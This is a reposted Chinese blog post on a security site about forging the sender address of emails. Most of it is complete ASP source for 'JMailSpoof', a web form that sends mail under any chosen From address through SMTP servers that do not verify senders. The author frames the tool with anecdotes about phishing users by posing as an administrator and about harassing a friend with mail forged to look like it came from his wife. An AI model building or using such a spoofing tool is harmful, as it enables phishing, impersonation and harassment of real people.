伪造发件人邮件地址 's

admin
admin
admin
139701
文章
114
评论
2017年4月16日16:45:02评论289 views字数 2737阅读9分7秒阅读模式
摘要

作者:lake2
来源:lake2的专栏这篇文章完全没技术含量记得若干年前第一次看《黑客X档案》的时候,有篇名为《社会工程学破解Email》的文章,就是利用邮件冒充管理员里骗取用户密码。当时真的太菜,居然真的照着书上一个一个字符的去打HTML……呵呵,心酸往事不提。

作者:lake2
来源:lake2的专栏

这篇文章完全没技术含量

记得若干年前第一次看《黑客X档案》的时候,有篇名为《社会工程学破解Email》的文章,就是利用邮件冒充管理员里骗取用户密码。当时真的太菜,居然真的照着书上一个一个字符的去打HTML……呵呵,心酸往事不提。

言归正传,发匿名邮件完全有益身心健康的,比如剑心那小子老是剥削我,我心里不爽就发邮件骂他,为了不让他知道我是谁就伪造一个邮件地址咯,再狠点,嗯,邮件地址就写成他老婆的,然后一边呆着看他们吵架(嘿嘿,好狠毒啊)。

基于此,写了一个利用Jmail组件发匿名邮件的ASP代码,前提是你的SMTP服务器没有验证发件人地址才是,很多虚拟主机的SMTP服务器就可以的。

代码如下:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<%if request("action")="send" then%>
<%
Dim strSubject,strEmail,strMailAdress,strSender,strContent,strFromer
strSubject = Request("title")
strContent = Request("content")
strSender = Request("Name")
strEmail = Request("to")
strMailAddress = Request("smtp")
strMailUser = Request("usr")
strMailPass = Request("pwd")

Set JMail = Server.CreateObject("JMail.Message")
JMail.Charset = "gb2312"
JMail.From = Request("From")
JMail.FromName = strSender
JMail.Subject =strSubject
JMail.MailServerUserName = strMailUser
JMail.MailServerPassword = strMailPass
JMail.Priority = 3
JMail.AddRecipient(strEmail)
JMail.Body = strContent
JMail.Send(strMailAddress)
%>
<Script>
alert('没报错就可能成功啦!');
</Script>
<%
else
%>
<style type="text/css">
<!--
body { margin-top: 0px;margin-bottom: 0px;}td {
font-size: 12px;
text-decoration: none;}--></style>
<title>JMailSpoof v0.1</title><table width="500" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#666666">
<tr><td height="40" bgcolor="#E3E3E3"><div align="center">JMailSpoof by lake2</div></td></tr>
<tr><td><table width="100%" height="392" border="0" align="center" cellpadding="1" cellspacing="1">
<form name="form" method="post" action="?action=send">
<tr bgcolor="#FFFFFF">
<td align="center"><div align="left">SMTP服务器*</div></td>
<td><input name="smtp" type="text" id="smtp" size="22"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center"><div align="left">用户名*</div></td>
<td><input name="usr" type="text" id="usr" size="22"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center"><div align="left">密码*</div></td>
<td><input name="pwd" type="text" id="pwd" size="22"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center"><div align="left">收件人邮箱*</div></td>
<td><input name="to" type="text" id="to" size="22"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center"><div align="left">发件人邮箱*</div></td>
<td><input name="from" type="text" id="from" size="22">
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="110" align="center"><div align="left">邮件主题*</div></td>
<td width="288"><input name="title" type="text" id="title" size="22">

</td>
</tr>
<tr bgcolor="#FFFFFF">
<td height="15" align="center"><div align="left">发件人姓名*</div></td>
<td>
<input name="name" type="text" id="name" size="22"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td height="213" align="center"><div align="left">内容:*<br>
</div></td>
<td><textarea name="content" cols="50" rows="15"></textarea></td>
</tr>
<tr bgcolor="#FFFFFF">
<td> </td>
<td><input type="submit" name="Submit" value="提交"></td>
</tr>
</form></table></td>
</tr></table>
<%end if%>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月16日16:45:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   伪造发件人邮件地址 'shttps://cn-sec.com/archives/48810.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息